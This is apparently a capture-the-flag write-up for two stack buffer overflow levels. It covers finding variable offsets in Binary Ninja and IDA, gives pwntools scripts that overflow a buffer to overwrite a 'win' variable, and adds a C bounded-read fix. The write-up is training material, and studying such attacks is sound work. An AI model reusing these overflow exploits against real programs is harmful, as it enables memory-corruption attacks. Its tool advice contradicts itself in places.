🚩babymem

Notes

Binary Ninja

Binja High Level IL has its own syntax. It is a C-like language, but you can't assume it is just C. I recommend reading the documentation to avoid confusion.

Binary Ninja vs. IDA

The course itself recommends binja, but I recommend IDA, period. You will know why after you work through all the challenges.

Renaming

A huge part of this chapter is finding offsets of different variables. If you would like to do it the static analysis way, renaming these variables would help a lot.

Remote vs. Local

If you download the binary to your local machine, the relative offsets inside the binary stay the same. That is, you can use whatever tools you want on your local machine to find those offsets. You don't have to do everything on the remote machine.

Level 1

Teaching Level

Solution 1: Binja

To overwrite the win variable, we first need to figure out where the input buffer and the win variable are located in memory. In binja, I recommend the following workflow:

  • Step 1: Read linear high level IL, find key variables and rename them. In this case, we look for buffer and win.

  • Step 2: Switch to disassembly and look for renamed variables. Jot down their offsets.

Read the linear high level IL of the vuln() function and rename variables:

Switch to disassembly and look for buffer and win:

Solution 2: IDA

In IDA, things are even easier. First we name the win variable:

The offset relative to rbp can be found in the variable declarations:

The downside is that IDA does not recognize all the function names, so I still recommend binja for this chapter.

Exploit

#!/usr/bin/env python3
from pwn import *

#--------Setup--------#

context(arch="amd64", os="linux")
elf = ELF("/babymem_level1_testing1", checksec=False)

#--------ret2win--------#

offset = 0x20            # distance from the start of buffer to win (from the disassembly)
payload_size = offset + 1  # 33: fill the buffer, plus one byte landing on win

payload = flat(
    b"A" * offset,       # fill the buffer up to win
    b"B",                # any non-zero byte overwrites win
)

p = elf.process()

p.sendlineafter(b"Payload size: ", str(payload_size).encode())
p.sendlineafter(f"Send your payload (up to {payload_size} bytes)!\n".encode(), payload)

p.interactive()

Level 2

Teaching Level

Solution

The offsets are not easy to find for this level. Instead, we just spam enough A's so that the win variable on the stack is overwritten.
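Both levels come down to the same defect: the program echoes the size we announce ("up to 33 bytes", "up to 1024 bytes") and reads that many bytes into a fixed 0x20-byte stack buffer, so anything past the buffer lands on win. The following C is an added example, not the challenge's source: it shows the bounded version of the "Payload size:" step that a fix would need (BUF_CAP, accept_size and read_payload are names I chose, and the sample input is constructed).

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen in the self-check */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_CAP 32  /* the 0x20-byte buffer found in level 1 */

/* Parse the announced payload size and bound it by the buffer's real
 * capacity. Returns the accepted size, or 0 when the request is
 * rejected: non-numeric, trailing junk, zero, negative, or > cap. */
size_t accept_size(const char *line, size_t cap)
{
    char *end;
    unsigned long long v;
    errno = 0;
    v = strtoull(line, &end, 10);
    if (end == line || errno == ERANGE) return 0;   /* no digits / overflow */
    while (*end == ' ' || *end == '\r' || *end == '\n') end++;
    if (*end != '\0') return 0;                     /* junk after the number */
    if (v == 0 || v > cap) return 0;                /* 33 and 1024 are refused here */
    return (size_t)v;
}

/* Hardened version of the "Payload size:" / "Send your payload" step:
 * read the size line, validate it, then read at most that many bytes
 * into dst. Returns the number of bytes stored, 0 if rejected. */
size_t read_payload(FILE *in, unsigned char *dst, size_t cap)
{
    char line[32];
    size_t n;
    if (!fgets(line, sizeof line, in)) return 0;
    n = accept_size(line, cap);
    if (n == 0) return 0;
    return fread(dst, 1, n, in);   /* bounded by cap, so win is never reachable */
}

/* Self-check on constructed input (not from the page): a 16-byte send. */
int main(void)
{
    unsigned char buf[BUF_CAP];
    char sample[] = "16\nAAAAAAAAAAAAAAAA";
    FILE *f = fmemopen(sample, sizeof sample - 1, "r");
    size_t n = f ? read_payload(f, buf, BUF_CAP) : 0;
    if (f) fclose(f);
    printf("accepted %zu of at most %d bytes\n", n, BUF_CAP);
    return n == 16 ? 0 : 1;
}
```

With this check in place the level 2 approach (sending far more than the buffer holds) is rejected at the size prompt instead of reaching the stack.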

Exploit

#!/usr/bin/env python3
from pwn import *

#--------Setup--------#

context(arch="amd64", os="linux")
elf = ELF("/babymem_level2_testing1", checksec=False)

#--------ret2win--------#

payload_size = 1024      # far larger than the buffer, so win is overwritten without knowing its offset

payload = flat(
    b"A" * payload_size,  # every byte past the buffer is non-zero
)

p = elf.process()

p.sendlineafter(b"Payload size: ", str(payload_size).encode())
p.sendlineafter(f"Send your payload (up to {payload_size} bytes)!\n".encode(), payload)

p.interactive()
